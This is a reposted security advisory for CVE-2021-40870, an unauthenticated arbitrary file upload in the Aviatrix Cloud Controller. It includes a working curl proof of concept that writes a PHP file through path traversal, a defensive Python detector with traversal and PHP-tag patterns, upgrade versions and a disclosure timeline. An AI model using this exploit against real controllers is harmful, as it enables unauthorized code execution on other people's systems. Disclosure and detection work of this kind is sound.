CVE-2021-40870 POC

admin, 2021-10-12 16:45:50, 365 views

Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code

Overview

While the Aviatrix UI requires authentication, many API calls do not enforce a check for authentication. Some of these API calls allow an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.

Proof of concept

  1. Make the following request to the Aviatrix Cloud Controller:

curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'

  2. Visit https://aviatrix.domain.tld/v1/test. This will show the PHP Version page.
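As an added defender-side example (not part of the original advisory or of Aviatrix's code), the following Python screens a captured POST body for the three indicators present in the request above: a traversal sequence in account_name, a PHP open tag in data, and a throwaway session id. It assumes a reverse proxy or WAF that hands over the request path and form body; the sample requests and the allowed-name policy are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Traversal sequence in either slash style (checked after URL-decoding).
TRAVERSAL = re.compile(r"\.\.[/\\]")
# PHP open tags: <?php, <?= and the short form <?
PHP_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)
# Assumed policy for an account name: letters, digits, '-' and '_' only, so a
# path can never be smuggled in. This is not Aviatrix's own validation rule.
SAFE_ACCOUNT = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
# Assumed lower bound for a genuine session id; the PoC uses the one-character CID=x.
MIN_CID_LEN = 16


def inspect_request(path: str, body: str) -> list[str]:
    """Return findings for one POST to the backend API; empty list means clean."""
    findings: list[str] = []
    if not path.startswith("/v1/backend"):
        return findings
    # parse_qs keeps repeated keys as lists; the first value is enough here.
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    account = unquote(params.get("account_name", ""))
    if TRAVERSAL.search(account):
        findings.append("account_name contains a path traversal sequence")
    elif account and not SAFE_ACCOUNT.match(account):
        findings.append("account_name has characters outside the allowed set")
    if PHP_TAG.search(unquote(params.get("data", ""))):
        findings.append("data parameter carries a PHP open tag")
    if len(params.get("CID", "")) < MIN_CID_LEN:
        findings.append("CID is missing or too short to be a real session id")
    return findings


# Constructed samples: the advisory's request shape and one benign call.
SAMPLES = [
    ("/v1/backend1",
     "CID=x&action=set_metric_gw_selections"
     "&account_name=/../../../var/www/php/test.php&data=hello<?php phpinfo()?>"),
    ("/v1/backend1",
     "CID=" + "a" * 32 + "&action=set_metric_gw_selections"
     "&account_name=prod-account&data=gw1,gw2"),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(path, inspect_request(path, body) or "clean")
```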

Mitigation/further actions

Upgrade to one of the following versions:

  • UserConnect-6.2-1804.2043 or later

  • UserConnect-6.3-1804.2490 or later

  • UserConnect-6.4-1804.2838 or later

  • UserConnect-6.5-1804.1922 or later

Advisory timeline

  1. 2021-05-12: Discovered

  2. 2021-08-24: Reported to Aviatrix security team

  3. 2021-08-26: Aviatrix security team confirms the vulnerability will be fixed in a forthcoming release

  4. 2021-09-11: Fix released

  5. 2021-09-12: CVE requested

  6. 2021-09-13: CVE allocated

https://github.com/0xAgun/CVE-2021-40870

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40870.yaml


Originally published on the WeChat public account (无级安全): CVE-2021-40870|POC

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided for security research and teaching only. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes none. For questions, contact us by e-mail (use a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).
Posted by admin on 2021-10-12 16:45:50. Please keep the original link when reposting (CN-SEC中文网, with thanks to the original author): http://cn-sec.com/archives/578215.html